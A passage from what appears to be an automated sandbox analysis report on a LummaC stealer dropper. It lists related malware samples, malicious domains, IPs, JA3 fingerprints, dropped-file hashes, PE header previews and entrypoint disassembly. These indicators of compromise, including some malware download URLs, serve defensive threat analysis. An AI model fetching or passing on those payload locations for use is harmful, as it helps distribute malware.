	Label_00000852555.doc.js	Get hash	malicious	Unknown	Browse	tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
	PO 20495088.exe	Get hash	malicious	FormBook	Browse	www.ssrnoremt-rise.sbs/3jsc/
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/zWkbOqX7/download
	http://kklk16.bsyo45ksda.top	Get hash	malicious	Unknown	Browse	kklk16.bsyo45ksda.top/favicon.ico
	gusetup.exe	Get hash	malicious	Unknown	Browse	www.glarysoft.com/update/glary-utilities/pro/pro50/
	Online Interview Scheduling Form.lnk	Get hash	malicious	Ducktail	Browse	gmtagency.online/api/check
172.67.219.133	Purchase Order.xls	Get hash	malicious	FormBook	Browse	paste.ee/r/r87uc
172.67.219.133	Purchase Order.xls	Get hash	malicious	Unknown	Browse	paste.ee/r/r87uc

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
klipjarifaa.shop	FloydMounts.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.74.235

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Gz1bBIg2Tw.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	yTcaknrrb8.exe	Get hash	malicious	LummaC	Browse	104.21.92.91
	Active_Setup.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.198.102
	eP6sjvTqJa.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.38.84
	GqjiKlwarV.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	172.67.220.198
	1znAXdPcM5.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.38.84
	YGk3y6Tdix.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.38.84
	https://mmm.askfollow.us/#CRD	Get hash	malicious	Unknown	Browse	104.17.24.14
	http://l.instagram.com/?0bfd7a413579bfc47b11c1f19890162e=f171d759fb3a033e4eb430517cad3aef&e=ATP3gbWvTZYJbEDeh7rUkhPx4FjctqZcqx8JLHQOt3eCFNBI8ssZ853B2RmMWetLJ63KaZJU&s=1&u=https%3A%2F%2Fbusiness.instagram.com%2Fmicro_site%2Furl%2F%3Fevent_type%3Dclick%26site%3Digb%26destination%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fig_redirect%252F%253Fd%253DAd8U5WMN2AM7K-NrvRBs3gyfr9DHeZ3ist33ENX9eJBJWMRBAaOOij4rbjtu42P4dXhL8YyD-jl0LZtS1wkFu-DRtZrPI1zyuzAYXXYv3uJfsc2GuuhHJZr0iVcLluY7-XzYStW8tPCtY7q5OaN0ZR5NezqONJHNCe212u1Fk3V5I6c8mMsj53lfF9nQIFCpMtE%2526a%253D1%2526hash%253DAd_y5usHyEC86F8X	Get hash	malicious	Unknown	Browse	104.26.13.60
	https://t.co/YjyGioQuKT	Get hash	malicious	Unknown	Browse	104.21.64.1
CLOUDFLARENETUS	Gz1bBIg2Tw.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	yTcaknrrb8.exe	Get hash	malicious	LummaC	Browse	104.21.92.91
	Active_Setup.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.198.102
	eP6sjvTqJa.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.38.84
	GqjiKlwarV.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	172.67.220.198
	1znAXdPcM5.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.38.84
	YGk3y6Tdix.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.38.84
	https://mmm.askfollow.us/#CRD	Get hash	malicious	Unknown	Browse	104.17.24.14
	http://l.instagram.com/?0bfd7a413579bfc47b11c1f19890162e=f171d759fb3a033e4eb430517cad3aef&e=ATP3gbWvTZYJbEDeh7rUkhPx4FjctqZcqx8JLHQOt3eCFNBI8ssZ853B2RmMWetLJ63KaZJU&s=1&u=https%3A%2F%2Fbusiness.instagram.com%2Fmicro_site%2Furl%2F%3Fevent_type%3Dclick%26site%3Digb%26destination%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fig_redirect%252F%253Fd%253DAd8U5WMN2AM7K-NrvRBs3gyfr9DHeZ3ist33ENX9eJBJWMRBAaOOij4rbjtu42P4dXhL8YyD-jl0LZtS1wkFu-DRtZrPI1zyuzAYXXYv3uJfsc2GuuhHJZr0iVcLluY7-XzYStW8tPCtY7q5OaN0ZR5NezqONJHNCe212u1Fk3V5I6c8mMsj53lfF9nQIFCpMtE%2526a%253D1%2526hash%253DAd_y5usHyEC86F8X	Get hash	malicious	Unknown	Browse	104.26.13.60
	https://t.co/YjyGioQuKT	Get hash	malicious	Unknown	Browse	104.21.64.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	Gz1bBIg2Tw.exe	Get hash	malicious	LummaC	Browse	188.114.97.3 172.67.219.133
	yTcaknrrb8.exe	Get hash	malicious	LummaC	Browse	188.114.97.3 172.67.219.133
	Active_Setup.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3 172.67.219.133
	Loader.exe	Get hash	malicious	LummaC	Browse	188.114.97.3 172.67.219.133
	Loader.exe	Get hash	malicious	LummaC	Browse	188.114.97.3 172.67.219.133
	PASS-1234.exe	Get hash	malicious	LummaC	Browse	188.114.97.3 172.67.219.133
	Loader.exe	Get hash	malicious	LummaC	Browse	188.114.97.3 172.67.219.133
	Launcher_x64.exe	Get hash	malicious	LummaC	Browse	188.114.97.3 172.67.219.133
	Solara-Roblox-Executor-v3.exe	Get hash	malicious	LummaC	Browse	188.114.97.3 172.67.219.133
	Delta.exe	Get hash	malicious	LummaC	Browse	188.114.97.3 172.67.219.133

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Active_Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	setup.exe	Get hash	malicious	LummaC	Browse
	Set-up.exe	Get hash	malicious	LummaC	Browse
	#Setup.exe	Get hash	malicious	LummaC	Browse
	installer_1.05_36.5.exe	Get hash	malicious	LummaC	Browse
	@Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	MdhO83N5Fm.exe	Get hash	malicious	LummaC	Browse
C:\Users\user\AppData\Local\Temp\is-66D10.tmp\_isetup\_isdecmp.dll	Active_Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	setup.exe	Get hash	malicious	LummaC	Browse
	Set-up.exe	Get hash	malicious	LummaC	Browse
	#Setup.exe	Get hash	malicious	LummaC	Browse
	installer_1.05_36.5.exe	Get hash	malicious	LummaC	Browse
	@Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	MdhO83N5Fm.exe	Get hash	malicious	LummaC	Browse
	installer_1.05_36.4.exe	Get hash	malicious	LummaC Stealer	Browse
	!Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	@Setup.exe	Get hash	malicious	LummaC	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe

Download File

Process:	C:\Users\user\Desktop\qnUFsmyxMm.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	8856972
Entropy (8bit):	7.960537715482043
Encrypted:	false
SSDEEP:	196608:uMonEZW6LN5TiMukr1UfDokfbn0kQv7croDi:uMoEFLT9xr+fPnbc7c
MD5:	C89C55FE25372BFBF8B9264A647C144B
SHA1:	77D03F9F9FAFAFC4D2B57428C18BFD093563682F
SHA-256:	C46D6103201008B96B237E10F2C6CA6874E6C0BEB507FE21F497578127AE8857
SHA-512:	D60535F3A12CECA7D5339513EE087DB46B2E3A6FF35D1939A7D5518CD6F4B407D7F1065F63B2AB10D21B9C0893F6F979B0AF85A0C40A5B02E9054874FDF4E044
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 51%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.................t...p....................@.......................................@......@...................p..q....P......................4..XG...........................................................R..\....`.......................text....V.......X.................. ..`.itext..d....p.......\.............. ..`.data...88.......:...x..............@....bss....Xr...............................idata.......P......................@....didata......`......................@....edata..q....p......................@..@.tls.....................................rdata..]...........................@..@.reloc..............................@..B.rsrc...............................@..@....................................@..@................

C:\Users\user\AppData\Local\Temp\d5f90697

Download File

Process:	C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exe
File Type:	PNG image data, 4224 x 1945, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	6529034
Entropy (8bit):	7.998110907699163
Encrypted:	true
SSDEEP:	196608:aU36HXf37kuxSPNTPnI0rq2Szy9HlXGWYVkyjt:gHXf37D0Zq8HlXGWYVkyjt
MD5:	2F4D508A154A5A27F886AA2AB5321348
SHA1:	33520EAD7583D585C6FA7E62143F5FE405BF50AD
SHA-256:	70F3F8AC0761752733B13851CC45765D6E0EF53A330FC15B8E108B760F60C467
SHA-512:	0F1E892729058597578961097DE70B9888782B02689C98F16606FD383DCEC51F9DC6EB7F1D26D76914882CE3B7867052766EBF3AA2943A0C2E85D1440A748D0E
Malicious:	false
Preview:	.PNG........IHDR..............._... .IDATx..;..G....+.U.{.. .....H.$..gm.i..;.+b...d.\.j.l..6..r..b.+..].\|.5....?".......3x....j._..=.?....W........pu..~..w..1..Z....n......8..A.4...#u].K.4MC.%....p..g....a..h...!...?.97w'/XJ..@CUU.R.#UU..K).R..RJ.{Y..K.u......]J..^..y.!.....R...,........b.I%.@7.&wW.1.]..\p\....2..u.......?..........{..@.48.<;4.w~.\|.5....g....)....O.....`.....i].w..3..q...W....I........l.bh..r....+y...&..-..!.....a/.p...!.m..\.2../.I>c....R.3p...H.g_.#.f..;..s.M&..(...._..o..;...RJ)\|......,..._p].....".........b.I..t.4u5\F.9.9..s....,._.....'.^.A...n...u...#..C........k..G..x)...!...(..c8..u. .g\.&.....d...?&..N....../GI>......rw.m1<$..}w..c..,l..n1.s...o..8... ..q..^...\'.....~.16 .....o..xY.%..M..cx``.\|..#5'..\|.%.Y..%.e.M......./.d.Ob.RI\..,..,_)<%....c8X...s....;...Lk]m;H.......8.~-vA.\|....{..&^.......}H...0N..`.....N.'..t{\=$.............o.....@Q..A.$..K5.!...$g..a.-F...K-$;K.. .ij....`....~...5\|`.o..

C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3367424
Entropy (8bit):	6.530011244733973
Encrypted:	false
SSDEEP:	98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
MD5:	F809F51E678B7F2E388F8C969EF902C8
SHA1:	DC1C645533E0FD1637BF455BA69A9481E7C4B83A
SHA-256:	8D6E5513DE230109BE2238537173352832D1AEBDC7B10FAD0E59D4882812CA81
SHA-512:	C500B40B604AD6203396FCC0243CBB50EAD544586EAB2448C2C6BCC2106DFAE3777A85C344766224F5F695FA60295880623B2A97B0AAE97DC547076FA03CD067
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Active_Setup.exe, Detection: malicious, Browse Filename: setup.exe, Detection: malicious, Browse Filename: Set-up.exe, Detection: malicious, Browse Filename: #Setup.exe, Detection: malicious, Browse Filename: installer_1.05_36.5.exe, Detection: malicious, Browse Filename: @Setup.exe, Detection: malicious, Browse Filename: MdhO83N5Fm.exe, Detection: malicious, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.......................................@..........................04.......3...@......@...................P,.n.....,.j:...P0.p.....................,.<............................p,.......................,......@,.(....................text............................. ..`.itext..$.......0................. ..`.data................*.............@....bss.....\|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc...p....P0......./.............@..@.............04......`3.............@..@................

C:\Users\user\AppData\Local\Temp\is-66D10.tmp\_isetup\_isdecmp.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	35616
Entropy (8bit):	6.953519176025623
Encrypted:	false
SSDEEP:	768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
MD5:	C6AE924AD02500284F7E4EFA11FA7CFC
SHA1:	2A7770B473B0A7DC9A331D017297FF5AF400FED8
SHA-256:	31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
SHA-512:	F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Active_Setup.exe, Detection: malicious, Browse Filename: setup.exe, Detection: malicious, Browse Filename: Set-up.exe, Detection: malicious, Browse Filename: #Setup.exe, Detection: malicious, Browse Filename: installer_1.05_36.5.exe, Detection: malicious, Browse Filename: @Setup.exe, Detection: malicious, Browse Filename: MdhO83N5Fm.exe, Detection: malicious, Browse Filename: installer_1.05_36.4.exe, Detection: malicious, Browse Filename: !Setup.exe, Detection: malicious, Browse Filename: @Setup.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P......................................D=...............................P.......P..(....................L.. ?...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-66D10.tmp\_isetup\_setup64.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.720366600008286
Encrypted:	false
SSDEEP:	96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
MD5:	E4211D6D009757C078A9FAC7FF4F03D4
SHA1:	019CD56BA687D39D12D4B13991C9A42EA6BA03DA
SHA-256:	388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
SHA-512:	17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-CF3GQ.tmp\_isetup\_isdecmp.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	35616
Entropy (8bit):	6.953519176025623
Encrypted:	false
SSDEEP:	768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
MD5:	C6AE924AD02500284F7E4EFA11FA7CFC
SHA1:	2A7770B473B0A7DC9A331D017297FF5AF400FED8
SHA-256:	31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
SHA-512:	F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P......................................D=...............................P.......P..(....................L.. ?...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-CF3GQ.tmp\_isetup\_setup64.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.720366600008286
Encrypted:	false
SSDEEP:	96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
MD5:	E4211D6D009757C078A9FAC7FF4F03D4
SHA1:	019CD56BA687D39D12D4B13991C9A42EA6BA03DA
SHA-256:	388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
SHA-512:	17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3367424
Entropy (8bit):	6.530011244733973
Encrypted:	false
SSDEEP:	98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
MD5:	F809F51E678B7F2E388F8C969EF902C8
SHA1:	DC1C645533E0FD1637BF455BA69A9481E7C4B83A
SHA-256:	8D6E5513DE230109BE2238537173352832D1AEBDC7B10FAD0E59D4882812CA81
SHA-512:	C500B40B604AD6203396FCC0243CBB50EAD544586EAB2448C2C6BCC2106DFAE3777A85C344766224F5F695FA60295880623B2A97B0AAE97DC547076FA03CD067
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.......................................@..........................04.......3...@......@...................P,.n.....,.j:...P0.p.....................,.<............................p,.......................,......@,.(....................text............................. ..`.itext..$.......0................. ..`.data................*.............@....bss.....\|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc...p....P0......./.............@..@.............04......`3.............@..@................

C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	846404211
Entropy (8bit):	0.14084982000793586
Encrypted:	false
SSDEEP:
MD5:	A42E953364198E087438838FD14040E7
SHA1:	14A8F937E6F683A68859EB5AA4B61C17048FC4D9
SHA-256:	5BD35BB6F3EE49884DB46F4E52E805BBEA8333C2627EAEEA8BC05785164CD576
SHA-512:	9A29901D832EA8B94A1C15BD9777F8E4DBA55A1198989EC73E4B4A87E17FBEB248220B8F35FD700285A7C9AD37C0B5616248A8248B3EE4076A5E085247228AC6
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"w.RC..RC..RC..I..`C..I...C..[;..UC..[;..IC..RC...B..I..NC..I..{C..I..SC..I..SC..RichRC..........................PE..L....NKO.....................Zi...................@...........................s.....T.s.......@...........................................f..........................................................................................................text...!........................... ..`.rdata...1.......2..................@..@.data...x........,..................@....rsrc.....f.......f.................@..@........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\ColorStreamLib\is-96L6E.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	846404211
Entropy (8bit):	0.14084982000793586
Encrypted:	false
SSDEEP:
MD5:	A42E953364198E087438838FD14040E7
SHA1:	14A8F937E6F683A68859EB5AA4B61C17048FC4D9
SHA-256:	5BD35BB6F3EE49884DB46F4E52E805BBEA8333C2627EAEEA8BC05785164CD576
SHA-512:	9A29901D832EA8B94A1C15BD9777F8E4DBA55A1198989EC73E4B4A87E17FBEB248220B8F35FD700285A7C9AD37C0B5616248A8248B3EE4076A5E085247228AC6
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"w.RC..RC..RC..I..`C..I...C..[;..UC..[;..IC..RC...B..I..NC..I..{C..I..SC..I..SC..RichRC..........................PE..L....NKO.....................Zi...................@...........................s.....T.s.......@...........................................f..........................................................................................................text...!........................... ..`.rdata...1.......2..................@..@.data...x........,..................@....rsrc.....f.......f.................@..@........................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.990708045299052
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	qnUFsmyxMm.exe
File size:	2'462'720 bytes
MD5:	a00f1411626bdf8860a00a2ee9f77709
SHA1:	cf1dca091b73e2c9fd8528a90cb66a68d7ddd744
SHA256:	39b753a793c07fe13d25dcb2e429cdadb40880fe3b86480a899f4898aaa2f1b6
SHA512:	1c38fc88948344d15e5c43f4a8eb31b55e7c29e072933046b0c469cb62485b84fa8ca5031e5602f4fbbf45f9c7e88c760b8c0884bd79464a7fe10a227778e0a6
SSDEEP:	49152:g1dMepjE16P8Q472L/nBNZvCece8T/OtLQ0e5iaPCVG9x3d9MnEbw8Q7G9QJ:IdMepjE16P8Q472jnBNZvCece8TGJQ02
TLSH:	97B5BE31A690C150FBB3A075A1A3529A967564F027CF74D3E3A423D9440BAECED31BB7
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........\.i.\.i.\.i..vj.Q.i..vl...i..vm.O.i...l.z.i...m.L.i...j.N.i..vh.Y.i.\.h...i...a.].i.....].i...k.].i.Rich\.i.........PE..L..

File Icon


Icon Hash:	607afae2d0c4fc0c

Static PE Info

General

Entrypoint:	0x60d340
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x67681E7C [Sun Dec 22 14:13:16 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	4159edb38142459c0d592c68fcfb12bb

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
call 00007F0F9953161Dh
pop ebp
ret
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push 00000000h
call dword ptr [0063F018h]
mov eax, dword ptr [ebp+08h]
push eax
call dword ptr [0063F014h]
push C0000409h
call dword ptr [0063F01Ch]
push eax
call dword ptr [0063F020h]
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call dword ptr [0063F024h]
test eax, eax
je 00007F0F99531919h
mov ecx, 00000002h
int 29h
mov dword ptr [00650E50h], eax
mov dword ptr [00650E4Ch], ecx
mov dword ptr [00650E48h], edx
mov dword ptr [00650E44h], ebx
mov dword ptr [00650E40h], esi
mov dword ptr [00650E3Ch], edi
mov word ptr [00650E68h], ss
mov word ptr [00650E5Ch], cs
mov word ptr [00650E38h], ds
mov word ptr [00650E34h], es
mov word ptr [00650E30h], fs
mov word ptr [00650E2Ch], gs
pushfd
pop dword ptr [00650E60h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [00650E54h], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [00650E58h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [00650E64h], eax

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x24db5c	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x253000	0x6f81	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x25a000	0x3468	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x24cb1c	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x24cb70	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x23f000	0x138	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x23d40a	0x23d600	8a29a5aac1bc8e02579247cecc894011	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x23f000	0xf254	0xf400	3ec7f432f0eb94a7cd4f45b0af0ddae9	False	0.32444287909836067	data	4.576652094150722	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x24f000	0x2e98	0x1e00	1989463e931412e158ee95057a52e60d	False	0.550390625	data	6.204475684569549	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.fptable	0x252000	0x80	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x253000	0x6f81	0x7000	8c9d2a0c40c5d5c1a365bf677f6461f7	False	0.45511300223214285	data	4.16373924956781	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x25a000	0x3468	0x3600	b4bbc3782923e89727c07604a431143f	False	0.7822627314814815	data	6.69615621273849	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x2536b8	0x1128	Device independent bitmap graphic, 32 x 64 x 32, image size 4352			0.6675774134790529
RT_MENU	0x2547e0	0x2b2	data			0.5463768115942029
RT_MENU	0x254a94	0x2e0	data			0.5475543478260869
RT_DIALOG	0x254d74	0x280	data			0.5203125
RT_DIALOG	0x254ff4	0x3f8	data			0.5078740157480315
RT_DIALOG	0x2553ec	0x434	data			0.5037174721189591
RT_DIALOG	0x255820	0x2dc	data			0.5505464480874317
RT_DIALOG	0x255afc	0x2a0	data			0.5654761904761905
RT_DIALOG	0x255d9c	0x5dc	data			0.4866666666666667
RT_DIALOG	0x256378	0x63c	data			0.4730576441102757
RT_DIALOG	0x2569b4	0x410	data			0.5278846153846154
